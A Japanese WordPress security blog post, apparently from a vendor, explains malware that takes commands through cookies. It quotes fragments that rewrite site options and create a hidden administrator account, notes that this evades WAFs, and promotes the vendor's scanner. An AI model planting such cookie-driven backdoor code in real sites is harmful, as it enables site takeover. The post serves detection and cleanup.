ワードプレスで$_COOKIEを経由して不正なコードを送り込んでくるマルウェアについて解説いたします。

$_COOKIEを経由して不正なコードを送り込んでくるマルウェア

COOKIEとは、本来ページ間の遷移でもデータを保持するように、サイト側がユーザーのブラウザーに記録するデータです。しかし特殊なソフトウェアを使うと、このCOOKIEを自由に設定し、サーバー側で読み込ませる事ができます。

下図のマルウェアはWPドクターで検出したマルウェアのコードの一部です。

このマルウェアでは_gcookie 関数で、任意のCOOKIEの値を読み取り、

update_option('d', $d); 

というコード部分でワードプレスの設定を書き換えたり、

$user_id = wp_create_user($u, $p, $e);
$user = new WP_User($user_id);
$user->set_role('administrator');

という部分で不正なユーザーをワードプレス上に生成するマルウェアであることが分かります。

なぜハッカーはCOOKIE経由で不正なコーを送信してくるのか?

昨今この、COOKIE経由で不正なコードをサーバーに送信するマルウェアが増えてきております。一般的にはサーバーにデータを送信する方法は、$_POSTや$_GETというデータ送信用の仕組みを利用するのですが、$_POSTや$_GETがWAF(ファイアウォール)などで監視対象になっている場合、COOKIE経由で送信するとそのWAFの機能を回避できる為かと考えられます。

COOKIE経由の攻撃を防ぐには?

このCOOKIE経由の攻撃方法を事前に防御するようなWAFは2025年現在ではおそらくなく、上記のようなCOOKIE経由のデータ送受信をする設計のマルウェアがすでにサーバー上にある場合はWAFでデータの受信を事前に防ぐことは困難です。

この為、COOKIE経由の攻撃の受け手側の不正なプログラムをサーバー上から駆除する必要がございます。
マルウェア検出、駆除プラグインで、このようなマルウェアがサーバー上にあるか検査し、駆除いただくことをお勧めいたします。

当社開発の 【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除] の次のバージョン2.8(2025年8月末リリース予定)でCOOKIE経由の攻撃の検出ブロック機能を提供予定です。

WordPress ワードプレスのマルウェア駆除は専門家にお任せください。お気軽にご依頼・ご相談お送りください